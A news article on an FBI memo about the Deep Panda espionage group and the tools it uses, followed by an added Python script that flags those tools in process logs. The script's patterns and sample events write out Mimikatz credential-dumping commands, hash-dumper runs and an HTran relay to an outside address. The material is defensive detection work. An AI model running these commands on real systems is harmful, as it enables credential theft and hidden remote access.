Ongoing investigations by the FBI have revealed a group that has been compromising personal and sensitive business information from U.S. commercial and government networks in recent weeks.
In a memo sent to security leaders and community insiders, the agency warns that the data breaches were done "through cyber espionage" and that the tools used were the same ones leveraged by the group known as Deep Panda.
"Analysis of the malware samples indicates a significant amount of the computer network exploitation activities emanated from infrastructure located within China. The tools used in the attack were referenced in open source reports on Deep Panda. This group has previously used Adobe Flash zero-day exploits in order to gain initial access to victim networks. Information obtained from victims indicated that PII [Personally Identifiable Information] was a priority target."
The memo goes on to note that compromised PII has been used in other instances to target or otherwise facilitate other malicious activities such as financial fraud, but the group behind the FBI's latest investigations is not taking this approach.
"This group uses a wide variety of tools including generic hacking utilities in order to gain access, establish persistent network access, and move laterally through the victim network," the memo adds.
Attempts to get a better understanding of the situation by Salted Hash were less than productive, as the FBI does not comment on active investigations.
In 2013, Deep Panda (also known as Shell_Crew or KungFu Kittens) was the subject of a CrowdStrike report. CrowdStrike first took notice of the group in 2011, after being hired to investigate an attack at a large Fortune 500 company. Based on additional research, the firm determined that the group was connected to attacks targeting the Defense, Energy/Power, and Chemical industries in the U.S. and Japan.
"All of these samples reflect common tool marks and tradecraft consistent with Chinese-based actors who target various strategic interests of the United States including High Tech/Heavy Industry, Non-Governmental Organizations (NGOs), State/Federal Government, Defense Industrial Base (DIB), and organizations with vast economic interests," the CrowdStrike report said at the time.
A year later, working on behalf of their own clients, RSA Security published a detailed report on Deep Panda, mirroring some of the details from the CrowdStrike data, but augmenting it with updated details on the vulnerabilities and RAT (Remote Access Trojan) tools used.
While the FBI's memo isn't very detailed, the point seems to be that this group is still operational. They're motivated to obtain access and information, and in at least one case they've been successful.
Because the tools being used are generic and widely available, there is a reasonable chance that an attack could be detected and mitigated quickly. However, this group is known for taking its time and remaining quiet once it has a foothold, sitting on the network for long periods before acting.
The memo highlights Mimikatz, PwDump, and gsecdump (credential and password-hash dumpers), ScanLine (a command-line port scanner), and HTran (a connection bouncer used to relay traffic between hosts) as some of the more commonly available tools used during the attacks. In addition, the group is using the InfoAdmin RAT (Trojan.Kakfum) for remote access and exfiltration. All of these tools have been observed in both 32-bit and 64-bit builds.
"The presence of such tools should be immediately flagged if detected, reported to the FBI CYWATCH, and given priority enhanced mitigation," the memo advises.
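The memo asks defenders to flag the tools it names as soon as they appear. The following is an added example, written for this article and not part of the FBI memo or of any vendor product, of how a detection script might do that over process-creation events. It matches the image name of each new process against the tool names the memo lists (the same basename is used by the 32-bit and 64-bit builds, so the architecture folder in the path is ignored) and, because attackers routinely rename binaries, adds a second layer that looks at the command line instead. The Mimikatz module syntax ("sekurlsa::logonpasswords", "privilege::debug") is real; the HTran switches (-tran/-slave/-listen) and the pipe-separated event format and sample events are assumptions constructed for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Image basenames (lower-case, ".exe" stripped) of the tools named in the memo.
# Exact matches for short or fixed names; prefix matches for tools whose public
# builds carry a version suffix (pwdump7, gsecdump-v2b5).
TOOL_IMAGES: Dict[str, str] = {
    "mimikatz": "Mimikatz",
    "sl": "ScanLine",
    "scanline": "ScanLine",
    "htran": "HTran",
}
TOOL_IMAGE_PREFIXES: List[Tuple[str, str]] = [
    ("pwdump", "PwDump"),
    ("gsecdump", "gsecdump"),
]

# Command-line signatures: these fire even when the binary has been renamed.
# Mimikatz module syntax is real; the HTran switch names are an assumption.
CMDLINE_SIGNATURES: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\b(sekurlsa|lsadump|privilege|kerberos|token)::\w+", re.I), "Mimikatz"),
    (re.compile(r"(^|\s)-(tran|slave|listen)(\s|$)", re.I), "HTran"),
]


def image_basename(image_path: str) -> str:
    """Return the lower-case file name without '.exe', regardless of the
    directory (so x64\\mimikatz.exe and Win32\\mimikatz.exe match alike)."""
    name = image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify_process(image_path: str, cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (tool, reason) if the process looks like one of the listed tools."""
    base = image_basename(image_path)
    if base in TOOL_IMAGES:
        return TOOL_IMAGES[base], "image name"
    for prefix, tool in TOOL_IMAGE_PREFIXES:
        if base.startswith(prefix):
            return tool, "image name"
    for pattern, tool in CMDLINE_SIGNATURES:
        if pattern.search(cmdline):
            return tool, "command line (binary renamed?)"
    return None


def scan_events(lines: List[str]) -> List[Dict[str, object]]:
    """Scan constructed 'timestamp|host|image|commandline' process-creation
    events and return one alert per process that matches a listed tool."""
    alerts: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # malformed record; skip rather than crash the scan
        ts, host, image, cmdline = parts
        hit = classify_process(image, cmdline)
        if hit is not None:
            alerts.append({"line": n, "time": ts, "host": host, "image": image,
                           "tool": hit[0], "reason": hit[1]})
    return alerts


# Constructed sample events (not real telemetry); lines 2-7 should alert.
SAMPLE_EVENTS = [
    r"2015-07-22T10:00:01Z|WKS01|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
    r"2015-07-22T10:01:02Z|WKS01|C:\Users\Public\x64\mimikatz.exe|mimikatz.exe privilege::debug sekurlsa::logonpasswords exit",
    r"2015-07-22T10:02:15Z|WKS02|C:\Temp\Win32\update.exe|update.exe privilege::debug sekurlsa::logonpasswords exit",
    r"2015-07-22T10:03:40Z|WKS02|C:\Temp\sl.exe|sl.exe -p 10.0.0.1-10.0.0.254",
    r"2015-07-22T10:05:11Z|SRV01|C:\ProgramData\htran.exe|htran.exe -slave 203.0.113.5 443 127.0.0.1 3389",
    r"2015-07-22T10:06:30Z|SRV01|C:\ProgramData\gsecdump-v2b5.exe|gsecdump-v2b5.exe -a",
    r"2015-07-22T10:07:00Z|SRV01|C:\ProgramData\PwDump7.exe|PwDump7.exe",
    r"2015-07-22T10:08:45Z|WKS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Process",
]

if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(f"{a['time']} {a['host']}: {a['tool']} via {a['reason']} ({a['image']})")
```

Name matching alone is the weakest layer: a renamed mimikatz.exe (the third sample event) is only caught by its command line, and an exact match on "sl" can collide with an unrelated binary, so each alert still needs a triage step before it is escalated along the lines the memo suggests.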